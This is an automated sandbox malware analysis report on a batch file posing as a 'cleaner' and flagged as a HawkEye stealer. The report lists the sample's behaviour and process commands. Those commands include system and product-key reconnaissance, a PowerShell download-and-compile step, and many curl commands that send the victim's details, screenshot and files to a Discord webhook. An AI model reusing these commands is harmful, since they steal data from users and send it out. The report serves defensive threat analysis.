Malware Analysis Report

2024-09-22 10:48

Sample ID 240714-qjdl3a1hrr
Target SchooiCleaner_1.0___.bat
SHA256 4361ee39760d6451345a135dbb6845f2f17ddab9b1eb6c141c6cd37745b160c4
Tags
hawkeye execution keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4361ee39760d6451345a135dbb6845f2f17ddab9b1eb6c141c6cd37745b160c4

Threat Level: Known bad

The file SchooiCleaner_1.0___.bat was found to be: Known bad.

Malicious Activity Summary

hawkeye execution keylogger spyware stealer trojan

HawkEye

Blocklisted process makes network request

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Gathers system information

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Gathers network information

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-14 13:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 13:17

Reported

2024-07-14 13:19

Platform

win11-20240709-en

Max time kernel

136s

Max time network

124s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_1.0___.bat"

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\screenCapture.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2540 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2540 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2540 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2540 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2540 wrote to memory of 2320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2540 wrote to memory of 2320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2540 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 4756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2540 wrote to memory of 4756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 1628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 4756 wrote to memory of 1628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 4756 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4756 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2540 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2540 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2988 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2540 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2540 wrote to memory of 4156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2540 wrote to memory of 4156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2540 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2540 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2540 wrote to memory of 5632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 5632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2540 wrote to memory of 5616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 5616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2540 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2540 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1536 wrote to memory of 5940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1536 wrote to memory of 5940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1536 wrote to memory of 5940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2540 wrote to memory of 5800 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
PID 2540 wrote to memory of 5800 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
PID 2540 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 5148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 5148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 5924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2540 wrote to memory of 5924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_1.0___.bat"

C:\Windows\system32\mode.com

mode con cols=80 lines=30

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 437

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ping -4 -n 1 EHECWUZY | findstr [

C:\Windows\system32\PING.EXE

ping -4 -n 1 EHECWUZY

C:\Windows\system32\findstr.exe

findstr [

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Invoke-RestMethod api.ipify.org

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\system32\ipconfig.exe

ipconfig

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

wmic path softwarelicensingservice get OA3xOriginalProductKey

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP"

C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

screenCapture.exe screenshot.png

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:17:36.46 \nUsername: Admin \nComputer Name: EHECWUZY \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.0.146 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "file1=@Microsoft Edge.lnk" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 162.159.138.232:443 discord.com tcp
N/A 127.0.0.1:49846 tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/1068-0-0x00007FF883D23000-0x00007FF883D25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5wo5z4y.ip3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1068-10-0x000001FD7F510000-0x000001FD7F532000-memory.dmp

memory/1068-9-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

memory/1068-11-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

memory/1068-12-0x000001FD7FB60000-0x000001FD7FD22000-memory.dmp

memory/1068-15-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 c314cc5917d5a78a4e88f66d7114878c
SHA1 f4b714a9e5ac21fd60022a65818557e5ed192cf5
SHA256 eb8e99e59a78efe2b90663fdfca03f6664fed69cfa7a807e88047ffc6d674c31
SHA512 c02db5c81d2a55ef6b960b7b60b8bc7ad57ae250c1fe8709c40cab7acdcbfcf1fc0675682ea01ffe85cbd4146f67e1c90132d75e014d30403683e856615a4058

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ad60aefe903d80a798b904be4a3f0283
SHA1 5a27227a9aec298c043d9fe4162cc64664c01a25
SHA256 17c944d3e6e2a0dd06c58ae9cefe305fa7da552c010c012625abcc9585eeb214
SHA512 5a9ed746dd825929a2fa1a00b983563538be92a6b85df3728177e3a026babf659c0afadbf544c27aeae9b492b62ac9319af50eeeae610b0aee5256966d96470a

C:\Users\Admin\AppData\Local\Temp\screenCapture.bat

MD5 7c39bedd33b129b84117cb4e188eb9b6
SHA1 43e660c225a60a8327c7ce73ab6abaddcd412122
SHA256 2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711
SHA512 de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490

\??\c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP

MD5 b4aaae3b532554d0c7bd317d4834ab16
SHA1 28c854e399a3993ffd0df37b4385e29b4fe12905
SHA256 d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62
SHA512 ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8

C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp

MD5 0f133e69c8530b8ae98ec4adb4e9b1d0
SHA1 065c0f3aec8b2d506d0f2baa03e6e6868118b0c5
SHA256 0868235947268f367cb807d65816e4f1596f855cc435b84f99938a4ebafb857d
SHA512 e4e7eddb107b92b4d3e7e748f3c26532cdfcbc5865ef19881afc496ec1d7e00755b2f7fa2a9d6c3d38a9a0a1ff2d6b5043219c4f78c57eef72a5140dcb410b8b

C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

MD5 4a68364176d5b85c0c42bd1dabdd399d
SHA1 6b693434b279f571a4e816c175ae12239c226e32
SHA256 b1437c0601bd59676a95865b8919728f954e22a602c11be285919ab471343762
SHA512 9c7af471cdf60f7581e380ebafd37dfee2b0834289383b9de3e768707a447cd8bcb9f271e8a357143d9076ce85bab3fe40a2ccfb3c0f4e60f7660f32e6f57aac

memory/5800-63-0x0000000000D60000-0x0000000000D68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ipconfig.txt

MD5 dcdb73ae0926f69516bd5b5b9d2d1888
SHA1 fda0767da11c328981ccb9998af535a7929f0a1f
SHA256 aa743f1eaec4122e2b452997ebc80e7db7fa9583709bb64e3df9a7d15f1bea95
SHA512 d596a66800fb402a03d42a6b4bc13c9a402f929e761d39ab810ee836377e3c00658231ae730c5488af4f6a223f407d69ded6c484b61058c07cb1bc0625ca984b

C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

MD5 57ed60900c36f66a54186df4150c80eb
SHA1 e55ea3cb420ae7c6f59f5004e1ce7168efec4b9d
SHA256 a6540f80fc8a3910299935b562b547015fb5fdb8809e604a26018759cbbd5413
SHA512 85fd807a25a26430df9ca5512a94c78c576e6cdd35d6cc5ad981758d2afe9e0ff39109464f094cb6ef8158d0759fae3637fe75864b1c997797ce78423f7f27fc

C:\Users\Admin\AppData\Local\Temp\screenshot.png

MD5 f82c9e40b7cae4ff5450ee68768df515
SHA1 5c9a0d485be491e63cb11db7e55f675599f84ba6
SHA256 b451967373e438503dc1eab458bea08fc388c489ffb4c5d31e367f7d6e72f8aa
SHA512 dfd7602f17bf71a190fc058b14f160cb204c951285ba5e1d1da777c71b30d5df6a122366a615a7cde1186f9e2f065b6a95f0fc2ebdc88c30d16ea39f7695e79d

C:\Users\Admin\AppData\Local\Temp\dir.txt

